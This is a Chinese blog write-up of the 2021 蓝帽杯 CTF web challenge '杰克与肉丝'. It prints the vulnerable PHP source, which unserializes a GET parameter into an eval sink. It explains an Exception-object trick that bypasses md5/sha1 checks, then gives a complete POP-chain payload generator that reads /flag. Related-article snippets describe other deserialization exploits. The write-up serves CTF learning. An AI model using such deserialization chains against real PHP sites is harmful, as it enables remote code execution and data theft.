[2021 蓝帽杯]杰克与肉丝

最新推荐文章于 2024-06-16 19:43:17 发布
最新推荐文章于 2024-06-16 19:43:17 发布
阅读量803 收藏 2
点赞数 1
文章标签: web安全 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/127184136
版权

前置知识:

原生类Exception绕过md5,sha1

先看看原生类Exception里面有什么:

<?php
var_dump($a=new Exception());

这里有个非常有意思的绕过md5和sh1的方法。

来看两个例子:

<?php

class Test{

public $var1;

public $var2;

function __destruct(){

if(md5($this->var1)===md5($this->var2))

{

echo "yes";

}

else{

echo "no";

}

}

}

$str="highlight_file('/flag');?>";

$var1=new Exception($str,1);$var2=new Exception($str,2);

var_dump(md5($var1));

var_dump(md5($var2));

$R = new Test();

$R->var1=$var1;

$R->var2=$var2;

//输出

<?php

class Test{

public $var1;

public $var2;

function __destruct(){

if(md5($this->var1)===md5($this->var2))

{

echo "yes";

}

else{

echo "no";

}

}

}

$str="highlight_file('/flag');?>";

$var1=new Exception($str,1);

$var2=new Exception($str,2);

var_dump(md5($var1));

var_dump(md5($var2));

$R = new Test();

$R->var1=$var1;

$R->var2=$var2;

输出:

这两段代码唯一的 区别就是:

$var1和$var2是否同行

如果同行的话,则md5值不相等。SHA1则同理。

解题

题目直接给出源码:

<?php
highlight_file(__file__);


class Jack
{
    private $action;


    function __set($a, $b)
    {
        $b->$a();

    }

}

class Love {

    public $var;
    function __call($a,$b)
    {
        $rose = $this->var;
        call_user_func($rose);
    }

    private function action(){
        echo "jack love rose";
    }

}
class Titanic{
    public $people;
    public $ship;
    function __destruct(){

        $this->people->action=$this->ship;
    }
}
class Rose{
    public $var1;
    public $var2;
    function __invoke(){
        if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
            eval($this->var1);
        }
    }
}

if(isset($_GET['love'])){
    $sail=$_GET['love'];
    unserialize($sail);
}
?>

链子的过程比较简单 ,难点在绕过md5那里,以前没有接触过。

还有要注意的就是从后往前赋值。其他没什么了(我下面标出了序号)

直接给出payload:

<?php


class Jack // 2
{
    private $action;


    function __set($a, $b)  // 给不存在赋值
    {

    }

}

class Love { // 3

    public $var;
    function __call($a,$b)  // 调用不存在方法或者不可访问方法
    {
		echo "Love";
        $rose = $this->var;
        call_user_func($rose);  // 可以触发__invoke
    }

}
class Titanic{ // 1
    public $people;
    public $ship;
    function __destruct(){ // 销毁变量
        $this->people->action=$this->ship;
    }
}
class Rose{ // 4
    public $var1;
    public $var2;
    function __invoke(){  // 对象调用为函数
		var_dump($this->var1);
		var_dump($this->var2);
        if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
			echo "yes";
			eval($this->var1);
        }
    }
}

$a=new Titanic();
$b=new Jack();
$c=new Love();
$d=new Rose();
$str="highlight_file('/flag');?>";  //需要执行的读取flag文件的命令
$var1=new Exception($str,1);$var2=new Exception($str,2);
$d->var1=$var1;
$d->var2=$var2;
$c->var=$d;
$a->people=$b;
$a->ship=$c;
echo urlencode(serialize($a));
?>

我没做出来的原因是没有从后往前赋值,要先对序号后面的值进行赋值,再引用前面的类。否则会返回赋值为空的报错。

生成的payload直接打就可以了:

清风--
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
杯web----克与肉丝
qq_51233573的博客
01-24 746
访问靶机环境,得到一段php代码。 对这段php代码进行审计 <?php highlight_file(__FILE__); class Jack { private $action; //定义了一个私有的属性 只能类内部访问 function __set($a,$b) //魔术函数 当向一个不存在的属性或者私有属性写入数据的时候 会触发这个函数 { $b->$a(); } } class Love { public $var ...
PHP反序列化题目记录
BaiScorpio的博客
06-20 821
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
WP篇 克与肉丝复现
这周末在做梦的博客
06-09 763
半决赛-克与肉丝一,复现1复现的文件2EXP3复现的环境4效果图(文件结构)二,原理 一,复现 大家在复现的时候要注意php版本,大致情况是php5版本在反序列Excpetion类的时候会出现乱码,所以需要使用php7版本复现。 (上面的概述只经过了代码调式验证,属于个人推断)。 1复现的文件 index.php <?php highlight_file(__file__); class Jack { private $action; function
第五届杯半决赛部分WP
qq_46230755的博客
06-06 1269
文章目录RE:ser_leakWEB:克与肉丝PWN:cover RE:ser_leak 题目是原题: x1-x5: def func2(x): if x == 0: return 0 return (x % 2) + func2(x // 2) def func3(x): return x % 2 def func1(N, L, R): if L == R: return L mid = (L + R + 1) // 2 if N < mid * mid: retur
PHP渗透测试题目笔记
Zeker62的博客
02-10 5460
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1329
通过题目分析要去查看flag.php内容,进行实现,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实现这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。
【电子取证】网站取证(第六届”杯“全国大学生网络安全技能大赛)
07-12
第六届”杯“全国大学生网络安全技能大赛
第五届杯_2021_chall
05-13
第五届杯_2021_chall,沙盒机制的pwn题。
【电子取证】程序分析(第六届”杯“全国大学生网络安全技能大赛)
07-12
第六届”杯“全国大学生网络安全技能大赛
【MISC】domainhacker(第六届”杯“全国大学生网络安全技能大赛)
07-11
【MISC】domainhacker(第六届”杯“全国大学生网络安全技能大赛)
杯one_Pointer_php writeup
05-10
杯one_Pointer_php writeup
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6274
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
ctf题php反序列化,从一道CTF题中学习php反序列化与伪协议
weixin_39927214的博客
04-01 1744
之前一直有想写关于反序列化的东西,可是一直拖拖拖,拖到了现在。本文尝试从ZJCTF2019中的例题来了解何为php反序列,以及php伪协议。原题:逆转思维1234567891011121314151617181920$text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&am...
web安全-PHP反序列化漏洞
weixin_61956136的博客
07-10 2056
web安全-PHP反序列化漏洞
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 242
动态的web扫描,爬取目标网站的接口、链接,通过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,通过监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
网络安全(补充)
m0_62207482的博客
06-16 541
网络蠕虫是一种具有自我复制和传播能力、可独立自动运行的恶意程序,属于主动传播。属于被动传播的有计算机病毒、特洛伊木马、逻辑炸弹、细菌、恶意脚本、恶意Active X控件、间谍软件等 文件型病毒系计算机病毒德意志,主要通过感染计算机中的可执行文件(.exe)和命令文件(.com)。把所有通过操作系统的文件系统进行感染的病毒都称作文件病毒。可以感染所有标准的DOS可执行文件:包括批处理文件、DOS下的可加载驱动程序(.SYS)文件以及普通的COM/EXE可执行文件。由于HTML文件无法嵌入二进制执行代码,且是
攻防演练之-网络安全产品大巡礼二
村中少年的专栏
06-11 937
介绍SOAR,XDR,邮件网关email,sandbox云沙箱,firewall防火墙,WAF等甲方常见的安全产品
web安全渗透测试十大常规项(一):web渗透测试之任意文件读取
HACKONE的博客
06-16 40
file、path、data、filepath、readfile、data、url、realpath等。download,down,readfile,read,del,dir,path,src,Lang等。常规下载URL:http://www.xiaodi8.com/upload/123.pdf。利用:常规下载敏感文件(数据库配置,中间件配置,系统密匙等文件信息)上传类函数,删除类函数,下载类函数,目录操作函数,读取查看函数等。文件上传,文件下载,文件删除,文件管理器等地方。2、文件删除(常出现后台中)
2023杯初赛misc下载
12-04
2023杯初赛misc下载是指在2023年举办的杯网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手需要前往杯竞赛官方网站或相关论坛查找与初赛misc下载相关的公告或指引。这些网站通常会提供下载链接或资源分享的方式,以方便选手获取题目所需的文件或资源。 其次,根据所提供的下载链接,选手可以点击链接进行下载,也可以使用迅雷、qq旋风等下载工具进行高速下载,以确保下载的文件完整和无误。 在完成下载后,选手需要对下载的文件进行验证。可使用md5校验工具对下载后的文件进行校验,以确保文件的完整性和正确性,防止下载过程中出现错误导致文件损坏。 之后,选手可以开始进行miscellaneous题目的解析和答题。首先,解压下载的文件,查看所提供的题目资源、源代码或二进制文件等。根据题目要求和提示,选手可以使用各种工具和技术,如逆向工程、数据分析、密码学等,进行问题的分析和解决,并找出相应的答案或flag。 最后,选手需要将自己的解题过程、思路和答案记录下来,并按照比赛规则的要求提交答案。可以是一个文本文件或截图,或是将解决问题的代码或脚本提交到竞赛平台或指定的邮箱中。 总之,2023杯初赛misc下载是参赛选手在参加杯网络安全竞赛中所需进行的一项任务。选手需要在杯官方网站或相关论坛上获取下载链接并下载题目相关的文件或资源,然后对其进行验证、解析和解决,最后提交答案以完成竞赛的要求。这项任务对选手的网络安全技术、解题思维和团队合作能力都提出了较高的要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值